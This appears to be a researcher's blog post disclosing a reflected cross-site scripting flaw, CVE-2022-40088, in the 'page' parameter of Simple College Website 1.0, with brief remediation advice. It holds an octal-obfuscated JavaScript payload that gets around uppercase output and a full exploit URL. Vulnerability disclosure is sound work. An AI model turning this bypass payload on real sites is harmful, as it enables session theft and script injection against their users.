How I found CVE-2022–40088

@fuffsec
System Weakness
Published in
2 min readNov 18, 2022

--

Hey Squad,

Today I will be telling you guys how I found CVE-2022–40088.

Simple College Website 1.0 allows a user to perform Reflected Cross-site scripting via /college_website/index.php?page= when sending Javascript code to the “page” parameter.

Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html

Source Code: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip

Photo by Muha Ajjan on Unsplash

Identification

When I sent a random text to the endpoint “/college_website/index.php?page=<random_text>”, I observed that it was added to the response HTML without any encoding.

Burp Req/Res

Hacking

From the Response of the Burp, I could see that the injection point output is capitalized. This would cause some trouble with executing the Javascript payload as it is case-sensitive.

After a good amount of search and research, I came up with the following payload.

[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()

Thanks to the blog https://en.qdmana.com/2022/188/202207070757366180.html.

Final url with payload:

http://<domain>/college_website/index.php?page=<script>[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()</script>

Script execution

Remediation

  1. Filter input on arrival.
  2. Encode data on output.

Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.

You can buy me a coffee if you would like to -> https://www.buymeacoffee.com/gowthamaraj

--

--

Security Researcher | (OSWE, OSCP, OSWA, OSWP, CRTP, eWPTX, SSCP)